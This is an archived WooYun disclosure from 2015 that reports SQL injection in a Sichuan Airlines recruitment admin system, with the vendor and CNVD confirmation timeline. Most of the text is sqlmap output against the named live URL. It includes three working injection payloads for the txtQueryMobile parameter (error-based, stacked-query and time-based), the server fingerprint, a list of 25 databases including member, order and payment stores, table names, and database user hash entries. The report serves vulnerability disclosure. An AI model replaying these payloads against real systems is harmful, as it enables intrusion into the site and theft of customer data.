乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-08: 细节已通知厂商并且等待厂商处理中 2015-03-11: 厂商已经确认,细节仅向厂商公开 2015-03-21: 细节向核心白帽子及相关领域专家公开 2015-03-31: 细节向普通白帽子公开 2015-04-10: 细节向实习白帽子公开 2015-04-22: 细节向公众公开
四川航空某系统存在SQL注入
昨天交的弱密码问题还没审核,那就顺便找找别的漏洞吧问题所在系统:http://www.scal.com.cn/invite2011/admin/ 需要登录注入点
多个参数试了2个,别的请自查
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:---Place: POSTParameter: txtQueryMobile Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl 8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' AND 2000=CONVERT(INT,(SELECT CHAR(113) CHAR(105) CHAR(102) CHAR(97) CHAR(113) (SELECT (CASE WHEN (2000=2000) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(121) CHAR(120) CHAR(117) CHAR(113))) AND '%'='&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl 8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%'; WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl 8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005available databases [25]:[*] Invite2011[*] master[*] model[*] msdb[*] SCAL3_B2C[*] SCAL3_Card[*] SCAL3_Familiar[*] SCAL3_Hotel[*] SCAL3_Insurance[*] SCAL3_InsuranceNew[*] SCAL3_Itinerary[*] SCAL3_Log[*] SCAL3_Mall[*] SCAL3_Member[*] SCAL3_Message[*] SCAL3_MinPrice[*] SCAL3_News[*] SCAL3_Order[*] SCAL3_Pay[*] SCAL3_Preferential[*] SCAL3_SaleRule[*] SCAL3_SessionService[*] SCAL3_SOA[*] SCAL3_System[*] tempdb
<Database: master[291 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || sys.all_columns /code><code>Database: Invite2011[11 tables]+---------------------------------------------------+| sqlmapoutput || sysdiagrams || t_Invite || t_InviteEducation || t_InviteEducation_bak || t_InviteFamily || t_InviteFamily_bak || t_InviteWork || t_InviteWork_bak || t_Invite_bak || t_User |+---------------------------------------------------+Database: msdb[10 tables]+---------------------------------------------------+| backupfile || backupmediafamily || backupmediaset || backupset || logmarkhistory || restorefile || restorefilegroup || restorehistory || suspect_pages || sysdac_instances |+---------------------------------------------------+
<code></cback-end DBMS: Microsoft SQL Server 2005database management system users password hashes:[*] invite [1]: password hash: NULL[*] sa [1]: password hash: NULLode>其它库貌似是http://www.scal.com.cn/B2C的
需要提权
危害等级:高
漏洞Rank:11
确认时间:2015-03-11 11:32
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向网站管理单位通报。
暂无